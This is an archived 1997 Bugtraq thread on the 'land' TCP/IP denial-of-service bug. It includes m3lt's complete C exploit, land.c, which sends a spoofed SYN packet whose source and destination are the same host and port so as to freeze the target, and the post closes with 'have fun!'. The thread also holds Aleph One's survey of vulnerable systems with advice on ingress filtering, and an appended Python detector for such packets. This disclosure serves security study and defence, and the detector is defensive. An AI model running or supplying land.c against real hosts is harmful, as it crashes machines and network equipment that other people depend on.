--- Begin Message ---
I tested this on a falcon running mint 1.14 pl3, mintnet 1.0 pl1 and rlogin as the only service available. It seems to lock the machine quite well, but ctrl-alt-del still works. As other systems have behaved in strange ways, I'll need to test some more.

---clip---clip---

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.971120193920.5942A-100000@lagged.net>
Date: Thu, 20 Nov 1997 19:40:19 -0500
Reply-To: m3lt <meltman@LAGGED.NET>
From: m3lt <meltman@LAGGED.NET>
Subject: new TCP/IP bug in win95
To: BUGTRAQ@NETSPACE.ORG

hi,

i recently discovered a bug which freezes win95 boxes. here's how it works: send a spoofed packet with the SYN flag set from a host, on an open port (such as 113 or 139), setting as source the SAME host and port (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock up. the piece of code included in this message does that, so... have fun!

i haven't tested this bug on other platforms, i don't have the resources. please feel free to do so.
m3lt
meltman@lagged.net

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

/* TCP pseudo-header for the checksum, with the TCP header copied in behind it */
struct pseudohdr
{
    struct in_addr saddr;
    struct in_addr daddr;
    u_char zero;
    u_char protocol;
    u_short length;
    struct tcphdr tcpheader;
};

/* one's-complement checksum over the pseudo-header + TCP header
   (note: value is used without being initialised) */
u_short checksum(u_short * data,u_short length)
{
    register long value;
    u_short i;

    for(i=0;i<(length>>1);i++)
        value+=data[i];
    if((length&1)==1)
        value+=(data[i]<<8);
    value=(value&65535)+(value>>16);
    return(~value);
}

int main(int argc,char * * argv)
{
    struct sockaddr_in sin;
    struct hostent * hoste;
    int sock;
    char buffer[40];
    struct iphdr * ipheader=(struct iphdr *) buffer;
    struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
    struct pseudohdr pseudoheader;

    fprintf(stderr,"land.c by m3lt, FLC\n");

    if(argc<3)
    {
        fprintf(stderr,"usage: %s IP port\n",argv[0]);
        return(-1);
    }

    /* resolve the target; the same address is reused as the forged source below */
    bzero(&sin,sizeof(struct sockaddr_in));
    sin.sin_family=AF_INET;
    if((hoste=gethostbyname(argv[1]))!=NULL)
        bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
    else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
    {
        fprintf(stderr,"unknown host %s\n",argv[1]);
        return(-1);
    }

    if((sin.sin_port=htons(atoi(argv[2])))==0)
    {
        fprintf(stderr,"unknown port %s\n",argv[2]);
        return(-1);
    }

    /* raw socket: the IP header below is built by hand rather than by the kernel */
    if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
    {
        fprintf(stderr,"couldn't allocate raw socket\n");
        return(-1);
    }

    bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->version=4;
    ipheader->ihl=sizeof(struct iphdr)/4;
    ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->id=htons(0xF1C);
    ipheader->ttl=255;
    ipheader->protocol=IP_TCP;
    /* source == destination and sport == dport: this is the whole "land" condition */
    ipheader->saddr=sin.sin_addr.s_addr;
    ipheader->daddr=sin.sin_addr.s_addr;
    tcpheader->th_sport=sin.sin_port;
    tcpheader->th_dport=sin.sin_port;
    tcpheader->th_seq=htonl(0xF1C);
    tcpheader->th_flags=TH_SYN;
    tcpheader->th_off=sizeof(struct tcphdr)/4;
    tcpheader->th_win=htons(2048);

    bzero(&pseudoheader,12+sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.protocol=6;
    pseudoheader.length=htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
    tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

    if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,
              (struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
    {
        fprintf(stderr,"couldn't send packet\n");
        return(-1);
    }

    fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
    close(sock);
    return(0);
}

--- snip snip -----------------------------------------------------------

From: Aleph One <aleph1@dfw.net>
Subject: Re: "LAND" Attack Update
To: BUGTRAQ@NETSPACE.ORG
Date: Fri, 21 Nov 1997 13:22:22 -0600
Reply-To: Aleph One <aleph1@dfw.net>
Message-ID: <Pine.SUN.3.94.971121131518.2700D-100000@dfw.dfw.net>
In-Reply-To: <Pine.SUN.3.94.971121011301.9521D-100000@dfw.dfw.net>
Xref: gfanrend.fishpool.com bugtraq:1182

The latest update. It seems that not many versions of IOS are affected. The symptoms can also be strange. It will stop accepting connections, then after 30 seconds it may stop processing ICMP echos, and after that it stops forwarding packets. So if you perform the test wait a couple of minutes and see if it is still up before you come to any conclusions. Ivan Ganev also reports that testing against port 23 alone would not kill the router but testing against the first 255 ports did.

From the reports it seems to be the older revisions of IOS (10.X and 11.0) in certain hardware configurations and the Cisco 700 Series ISDN access routers (not running IOS) that are vulnerable.

We keep getting conflicting reports for FreeBSD and OpenBSD. There are enough reports and indications that those operating systems are indeed vulnerable but the vulnerability may not show up in all configurations depending on the environment, the intensity of cosmic rays, the phase of the moon, and if the testing person is left or right handed.

An external "land" attack should not be an issue if you are filtering IP address spoofing at your ingress routers. You _ARE_ doing so? Correct? Well in case you forgot you can find Paul Ferguson's "Network Ingress Filtering: Defeating Denial of Service Address Spoofing" Internet Draft at ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt

I highly recommend you implement its recommendations.
Of course you are still at the mercy of those behind the filter.

The survey says:

AIX 3                                        IS vulnerable
AIX 3.2                                      NOT vulnerable
AIX 4                                        NOT vulnerable
AIX 4.1                                      NOT vulnerable
BeOS Preview Release 2 PowerMac              IS vulnerable
BSDI 2.1 (vanilla)                           IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024)        NOT vulnerable
BSDI 3.0                                     NOT vulnerable
DG/UX R4.12                                  NOT vulnerable
Digital UNIX 4.0                             NOT vulnerable
FreeBSD 2.2.2-RELEASE                        (conflicting reports)
FreeBSD 2.2.5-RELEASE                        (conflicting reports)
FreeBSD 2.2.5-STABLE                         (conflicting reports)
FreeBSD 3.0-CURRENT                          IS vulnerable
HP External JetDirect Print Servers          IS vulnerable
HP-UX 10.20                                  IS vulnerable
IRIX 5.3                                     IS vulnerable
IRIX 6.2                                     NOT vulnerable
IRIX 6.3                                     NOT vulnerable
IRIX 6.4                                     NOT vulnerable
Linux 2.0.30                                 NOT vulnerable
Linux 2.0.32                                 NOT vulnerable
MacOS 7.5.1                                  NOT vulnerable
MacOS 8.0                                    IS vulnerable (TCP/IP stack crashed)
MVS OS390 1.3                                NOT vulnerable
NetApp NFS server 4.3                        IS vulnerable
NetBSD 1.1                                   IS vulnerable
NetBSD 1.2                                   IS vulnerable
NetBSD 1.2a                                  IS vulnerable
NetBSD 1.2.1                                 IS vulnerable
NetBSD 1.3_ALPHA                             IS vulnerable
NeXTSTEP 3.0                                 IS vulnerable
NeXTSTEP 3.1                                 IS vulnerable
Novell 4.11                                  NOT vulnerable
OpenBSD 2.1                                  (conflicting reports)
OS/2 3.0                                     NOT vulnerable
QNX 4.24                                     IS vulnerable
OpenBSD 2.2 (Oct31)                          NOT vulnerable
SCO OpenServer 5.0.4                         NOT vulnerable
Solaris 2.4                                  NOT vulnerable
Solaris 2.5.1                                NOT vulnerable
Solaris 2.6                                  NOT vulnerable
SunOS 4.1.4                                  IS vulnerable
Ultrix ???                                   NOT vulnerable
Windows 95 (vanilla)                         IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE          IS vulnerable
Windows NT (vanilla)                         IS vulnerable
Windows NT + SP3                             IS vulnerable
Windows NT + SP3 + simptcp-fix               IS vulnerable

Some misc stuff:

3Com SuperStack II                           IS vulnerable
Apple LaserWriter                            IS vulnerable
Ascend 4000 5.0Ap20                          NOT vulnerable
Ascend Pipeline 50 rev 5.0Ai16               NOT vulnerable
Ascend Pipeline 50 rev 5.0Ap13               NOT vulnerable
BayNetworks MARLIN 1000 OS (0).3.024(R)      NOT vulnerable
BinTec BIANCA/BRICK-XS 4.6.1 router          IS vulnerable
Cisco IOS 10.3(7)                            IS vulnerable
Cisco IOS 11.1(13)                           NOT vulnerable
Cisco 1003 IOS 11.0                          NOT vulnerable
Cisco 1005 IOS 11.0(4)                       NOT vulnerable
Cisco 1600 IOS 11.0(6) fc1                   IS vulnerable
Cisco 1601 IOS 11.1(8) AA                    NOT vulnerable
Cisco 1601 IOS 11.1(10)AA                    NOT vulnerable
Cisco 2500 IOS 11.0(9)                       NOT vulnerable
Cisco 2500 IOS 11.1(6) fc1                   IS vulnerable
Cisco 2500 IOS 11.1(10)                      NOT vulnerable
Cisco 2501 IOS 10.2                          IS vulnerable
Cisco 2501 IOS 10.2(2)                       IS vulnerable
Cisco 2501 IOS 10.(7)                        IS vulnerable
Cisco 2501 IOS 11.1(9)                       NOT vulnerable
Cisco 2501 IOS 11.2(4)P                      NOT vulnerable
Cisco 2503 IOS 11.0(9)                       IS vulnerable
Cisco 2509 IOS 11.1                          NOT vulnerable
Cisco 2511 IOS ???                           IS vulnerable
Cisco 2511 IOS 10.3(4)                       NOT vulnerable
Cisco 2511 IOS 11.1(8)                       NOT vulnerable
Cisco 2511 IOS 11.2(4)                       NOT vulnerable
Cisco 2514 IOS 11.2(5)                       NOT vulnerable
Cisco 3102 IOS 9.X                           IS vulnerable
Cisco 4000 IOS 11.0(7)                       NOT vulnerable
Cisco 4000 IOS 11.1(6)                       NOT vulnerable
Cisco 4000 IOS 11.2(4) fc1                   NOT vulnerable
Cisco 4000 IOS 11.2(9)                       NOT vulnerable
Cisco 4500 IOS 10.13(15)                     IS vulnerable
Cisco 4500 IOS 11.2(9)                       NOT vulnerable
Cisco 4700M IOS 11.0(16)                     NOT vulnerable
Cisco 7000 IOS 11.0(1)                       NOT vulnerable
Cisco 7000 IOS 11.0(16)                      NOT vulnerable
Cisco 7000 IOS 11.1(12)                      NOT vulnerable
Cisco 7000 IOS 11.2(8)                       NOT vulnerable
Cisco 7507 IOS 11.0(17)                      NOT vulnerable
Cisco 753 OS Release 4                       IS vulnerable
Cisco 753 OS Release 4.0                     IS vulnerable
Cisco 754 OS Release 4.1                     IS vulnerable
Cisco 761 OS Release 4.0(1)                  IS vulnerable
Cisco Catalyst 5000                          IS vulnerable
Digital VT1200                               IS vulnerable
HP Envizex Terminal                          IS vulnerable
LaserJet Printer                             NOT vulnerable
Livingston Office Router (ISDN)              IS vulnerable
Livingston PM ComOS 3.3.3                    NOT vulnerable
Livingston PM ComOS 3.5b17 + 3.7.2           NOT vulnerable
Livingston PM ComOS 3.7L                     NOT vulnerable
Livingston Enterprise PM 3.4 2L              NOT vulnerable
Milkyway Firewall 3.02 (SunOS)               IS vulnerable
NCD X Terminals, NCDWare v3.1.0              IS vulnerable
NCD X Terminals, NCDWare v3.2.1              IS vulnerable
--- End Message ---
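Added example (not part of the thread, and not m3lt's or Aleph One's code) covering both the packet signature m3lt describes and the ingress-filtering advice in the update: it parses raw IPv4/TCP bytes, flags a "land" packet (source address:port equal to destination address:port with SYN set) and applies the Ferguson-style ingress rule. It assumes the packet was captured on the external interface and that INTERNAL_NETS is the site's internal prefix; the test packet is constructed in memory and never sent.

```python
import ipaddress
import struct

TH_SYN = 0x02
# Assumed: prefixes that are only legitimate as packet *sources* on the inside.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

def parse_ipv4_tcp(pkt: bytes):
    """Return (src, dst, sport, dport, tcp_flags), or None if not IPv4/TCP."""
    if len(pkt) < 20:
        return None
    ver_ihl, proto, saddr, daddr = struct.unpack_from("!B8xB2x4s4s", pkt, 0)
    ihl = (ver_ihl & 0x0F) * 4
    if (ver_ihl >> 4) != 4 or ihl < 20 or proto != 6 or len(pkt) < ihl + 20:
        return None
    sport, dport, off_flags = struct.unpack_from("!HH8xH", pkt, ihl)
    return (ipaddress.IPv4Address(saddr), ipaddress.IPv4Address(daddr),
            sport, dport, off_flags & 0x01FF)

def is_land_packet(pkt: bytes) -> bool:
    """The signature described in the thread: a SYN whose source and
    destination address:port pairs are identical (10.0.0.1:139 -> 10.0.0.1:139)."""
    fields = parse_ipv4_tcp(pkt)
    if fields is None:
        return False
    src, dst, sport, dport, flags = fields
    return src == dst and sport == dport and bool(flags & TH_SYN)

def violates_ingress_filter(pkt: bytes, internal_nets=INTERNAL_NETS) -> bool:
    """Ferguson-style ingress rule for a packet seen on the *external* interface:
    it must not claim an internal source. A land packet aimed at an inside host
    always fails this, so the edge filter drops it before it reaches the stack."""
    fields = parse_ipv4_tcp(pkt)
    return fields is not None and any(fields[0] in net for net in internal_nets)

def build_tcp_syn(src: str, dst: str, sport: int, dport: int) -> bytes:
    """Constructed in-memory test packet (checksums left zero); never sent."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x0F1C, 0, 255, 6, 0,
                     ipaddress.IPv4Address(src).packed,
                     ipaddress.IPv4Address(dst).packed)
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0x0F1C, 0,
                      (5 << 12) | TH_SYN, 2048, 0, 0)
    return ip + tcp

if __name__ == "__main__":
    land = build_tcp_syn("10.0.0.1", "10.0.0.1", 139, 139)
    print(is_land_packet(land), violates_ingress_filter(land))  # True True
```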